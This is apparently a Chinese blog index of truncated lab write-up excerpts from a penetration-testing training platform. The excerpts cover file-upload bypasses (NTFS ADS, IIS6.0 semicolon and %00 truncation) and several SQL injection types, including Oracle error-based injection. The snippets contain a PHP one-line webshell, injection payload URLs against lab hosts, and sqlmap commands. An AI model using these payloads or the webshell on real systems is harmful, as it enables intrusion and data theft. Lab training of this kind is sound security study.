非法字符截断上传 — Windows NTFS ADS流
首先我们写一个马<?php eval($_POST[cmd])?>然后改成php后缀用bp进行抓包发现包如图所示POST /Pass-08/index.php?action=show_code HTTP/1.1Host: 120.203.13.75:8125User-Agent: Mozilla/5.0 (Windows&
CGI解析漏洞
先写好一句话木马<?php eval($_POST[cmd])?>然后保存为aaaa.jpg上传一下25上传文件名: aaaa.jpg文件类型: image/jpeg文件大小: 0.0244140625 kB文件存储在: ./c/image/1542200641.jpg开菜刀,在地址后面加一个1.php连接后就可以看到f
IIS6.0解析漏洞
先贴一下我所知道的(以我夕阳红记忆力还记得的)iis6.0的漏洞有哪些1、;的解析问题:比如我们上传1.asp;.jpg,waf会检测到最后一个后缀,也就是jpg格式,而iis6.0会因为;的截断,导致会认为这个文件是1.asp,便会以asp格式解析它。2、%00截断问题,和第一种近乎一样,%00直接使iis忽略%00之后的字符串,达到和第一种方法一样的效果。3、iis会把例如a.asp文件夹下所
SQL注入-Post注入
Rank 1发现是登陆栏,在用户名输入输入admin admin发现可以成功登陆,并且显示了sql语句,我们输入用户名为admin' order by 3#,密码为空,结果为Unknown column '3' in 'order clause'我们再试试order by 2,发现可以,说明有两个字段。我们试
sql注入--head注入
Rank 1首先我们进入网址,输入admin admin,再用hackbar打开post和useragent来loadurl,尝试再useragent里输入1,发现页面有一行Your User Agent is: 1我们加一个单引号Your User Agent is: 1'You have&nbs
SQL注入-延时注入
其实这就和盲注一样啊 sqlmap跑起来sqlmap.py -u url -p id --technique T --dbssqlmap.py -u url -p id --technique T --tablessqlmap.py -u url -p id --technique T --columns即可
SQL注入-宽字节注入
Rank 1首先我们来看一下有几个字段http://120.203.13.75:8150/New/WidecharBased/RankOne/sql-one/?id=1%df%27%20order%20by%203--+不报错,也就是说有三个字段http://120.203.13.75:8150/New/WidecharBased/RankOne/sql-one/?id=-1%df%27%20un
SQL注入-盲注&延时注入
Rank1盲注手注版id=1 and(ascii(substr(database()1,1)))>115--+就是截取database()的第一个字符,把它转化成ascii码,在和115比大小,如果比115大,因为and的缘故,页面会正常显示,如果不成立,页面应该无显示,因为就等于 id=1 and 0,应该是错误的。如果115不对,我们可以换成107,用二分法求解效率较高。但是手注比较麻烦
SQL注入-显错注入 Rank 1-4
Rank1首先我们加上id参数http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1加个单引号试试http://120.203.13.75:8150/New/ErrorBased/RankOne/sql-one/?id=1%27Your sql statement is SELECT&nb
Oracle注入- 报错注入
首先通过报错注入查出有哪些数据库http://o1.lab.aqlab.cn:81/?id=-1%27%20and%201=ctxsys.drithsx.sn(1,(select%20user%20from%20dual))%20--+结果为Warning: oci_execute(): ORA-20000: Oracle Text error:&